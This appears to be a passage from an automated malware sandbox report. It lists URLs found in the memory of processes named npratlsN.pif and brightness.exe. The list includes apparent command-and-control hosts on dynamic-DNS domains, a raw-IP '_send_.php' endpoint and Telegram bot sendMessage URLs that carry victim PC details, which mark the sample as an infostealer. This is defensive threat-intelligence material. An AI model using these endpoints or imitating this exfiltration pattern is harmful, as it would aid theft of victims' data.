https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	npratlsN.pif, 0000000A.00000002.3463602515.000000002B907000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C82C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA2E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022BA9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022A69000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022961000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.00000000227AC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022913000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022988000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D097000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CEBC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D178000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D2B9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D022000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D070000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	npratlsN.pif, 0000000E.00000002.3457231521.000000002193C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C0A4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3461578929.0000000029B0E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B9FA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3472486775.000000002DDE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F991000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2599953394.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EAA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3466644450.000000002ED8D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029E9E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3461578929.0000000029B0E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B9FA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3472486775.000000002DDE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F991000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2599953394.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EAA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3466644450.000000002ED8D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029E9E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	npratlsN.pif, 0000000A.00000003.2435365448.000000002CA7F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C807000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C87C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA35000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C832000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.000000002291B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022963000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022A44000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B62000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022787000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.00000000228EE000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D073000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D271000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D02A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CE97000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CFFF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D154000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	false		high
https://amazonenviro.com/admin/245_Nslta	brightness.exe, 00000004.00000002.1883329411.00000000206DD000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enlB	npratlsN.pif, 0000000A.00000002.3463602515.000000002B98B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://amazonenviro.com/Z	brightness.exe, 00000004.00000002.1860229176.0000000000656000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/h	npratlsN.pif, 0000000E.00000002.3457231521.000000002195E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://e6.o.lencr.org0	npratlsN.pif, 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3461578929.0000000029B0E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B9FA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3472486775.000000002DDE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F991000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2599953394.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EAA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3466644450.000000002ED8D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pmail.com0	brightness.exe, 00000004.00000002.1889917272.0000000021890000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1858000944.000000007F2CA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1883329411.00000000205D0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1856985915.0000000021F01000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1830836182.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890574991.0000000021FAB000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000002.2087769696.0000000020588000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.dr	false		high
https://reallyfreegeoip.org/xml/	npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B853000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.00000000217D3000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BEE5000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.office.com/	npratlsN.pif, 00000010.00000002.3457162026.000000002C0A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	brightness.exe, 00000004.00000002.1883329411.000000002064F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1831421420.000000007F300000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1890760472.000000007EFEF000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000D.00000002.1999576902.00000000206A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	npratlsN.pif, 0000000A.00000002.3463602515.000000002B907000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3469573834.000000002C82C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.2435365448.000000002CA2E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022BA9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022A69000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022961000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.00000000227AC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022913000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022988000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D097000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002CEBC000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D178000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D2B9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D022000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D070000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.	npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20a	npratlsN.pif, 0000000E.00000002.3457231521.000000002185C000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BF7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BE91000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp	false		high
http://mail.irco.com.sa	npratlsN.pif, 0000000A.00000002.3463602515.000000002B9EA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	npratlsN.pif, 0000000A.00000002.3469573834.000000002C8AA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022AD8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3460445803.0000000022B0A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D1E7000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3460013825.000000002D219000.00000004.00000800.00020000.00000000.sdmp	false		high
http://e6.i.lencr.org/0	npratlsN.pif, 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002BA05000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3461578929.0000000029B0E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B9FA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3472486775.000000002DDE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3454668828.000000001F991000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3466637591.00000000245B8000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.000000002190B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021917000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2520620466.00000000245ED000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000003.2599953394.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002C04E000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EAA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3466644450.000000002ED8D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3455442198.0000000029EE7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	npratlsN.pif, 0000000A.00000002.3463602515.000000002B9EA000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B8D4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.00000000218FB000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3457162026.000000002BFA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/0	npratlsN.pif, 00000010.00000002.3457162026.000000002C095000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	npratlsN.pif, 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000A.00000002.3463602515.000000002B801000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3457231521.0000000021781000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 